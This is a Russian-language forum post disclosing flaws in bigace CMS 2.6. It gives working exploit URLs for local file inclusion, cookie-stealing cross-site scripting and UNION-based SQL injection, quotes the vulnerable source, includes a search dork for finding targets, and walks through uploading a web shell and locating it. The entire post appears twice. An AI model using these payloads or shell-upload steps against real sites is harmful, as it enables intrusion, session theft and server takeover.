Dimi4
23.10.2009, 14:08
Уязвимости bigace CMS 2.6
Product: bigace CMS
Version: 2.6
Dork: "Powered by BIGACE 2.6"
Site: www.bigace.de
Found by: Dimi4
Date: 23.10.09
Local File Inclusion
/public/index.php : 78 line
// PROCESSING COMMAND INTERPRETER
$COMMAND_FILE = _BIGACE_DIR_ROOT . '/system/command/' . $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php';
if ( file_exists($COMMAND_FILE) )
{
include_once ($COMMAND_FILE);
Need: magic_quotes_gpc = OFF
http://localhost/test/bigace_2.6/public/index.php?cmd=[evil_file].php%00&id=tpl-frameset_tADMIN_len
Cross Site Scripting
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=tpl-frameset_tADMIN_len%3Cscript%3Ealert(document.cook ie)%3C/script%3E
При просмотре логов, сработает алерт (http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[id])
SQL-injection
Вы скажите да нахера нам скуля, если в админке уже? Так вот, для того чтобы узнать имя нашего шелла.
system/admin/plugins/logging.php : 76 line
if(isset($_GET['view']))
{
$values = array(
'ORDER_BY' => '',
'LIMIT' => '',
'WHERE_EXTENSION' => " AND id='".$_GET['view']."'"
);
$sqlString = $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter');
$sqlString = $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString, $values);
$entry = $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString);
$entry = $entry->next();
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cm s_item_5+where+id=[id]--+
Пошаговая заливка шелла:
В админке:
1. Идем в заливку файлов. Грузим свой шелл. Проверки на расширение нет. В результате получаем ИД, запоминаем. (Например ИД=3)
2. С помощю скули получаем зашифрованое имя шелла:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cm s_item_5+where+id=3--+
3. Получили допустим e449d2128602875bd6c84284a3458a42_1256285544.php
Идем в
http://localhost/test/bigace_2.6/consumer/cid1/items/file/[name]
Product: bigace CMS
Version: 2.6
Dork: "Powered by BIGACE 2.6"
Site: www.bigace.de
Found by: Dimi4
Date: 23.10.09
Local File Inclusion
/public/index.php : 78 line
// PROCESSING COMMAND INTERPRETER
$COMMAND_FILE = _BIGACE_DIR_ROOT . '/system/command/' . $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php';
if ( file_exists($COMMAND_FILE) )
{
include_once ($COMMAND_FILE);
Need: magic_quotes_gpc = OFF
http://localhost/test/bigace_2.6/public/index.php?cmd=[evil_file].php%00&id=tpl-frameset_tADMIN_len
Cross Site Scripting
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=tpl-frameset_tADMIN_len%3Cscript%3Ealert(document.cook ie)%3C/script%3E
При просмотре логов, сработает алерт (http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[id])
SQL-injection
Вы скажите да нахера нам скуля, если в админке уже? Так вот, для того чтобы узнать имя нашего шелла.
system/admin/plugins/logging.php : 76 line
if(isset($_GET['view']))
{
$values = array(
'ORDER_BY' => '',
'LIMIT' => '',
'WHERE_EXTENSION' => " AND id='".$_GET['view']."'"
);
$sqlString = $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter');
$sqlString = $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString, $values);
$entry = $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString);
$entry = $entry->next();
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cm s_item_5+where+id=[id]--+
Пошаговая заливка шелла:
В админке:
1. Идем в заливку файлов. Грузим свой шелл. Проверки на расширение нет. В результате получаем ИД, запоминаем. (Например ИД=3)
2. С помощю скули получаем зашифрованое имя шелла:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cm s_item_5+where+id=3--+
3. Получили допустим e449d2128602875bd6c84284a3458a42_1256285544.php
Идем в
http://localhost/test/bigace_2.6/consumer/cid1/items/file/[name]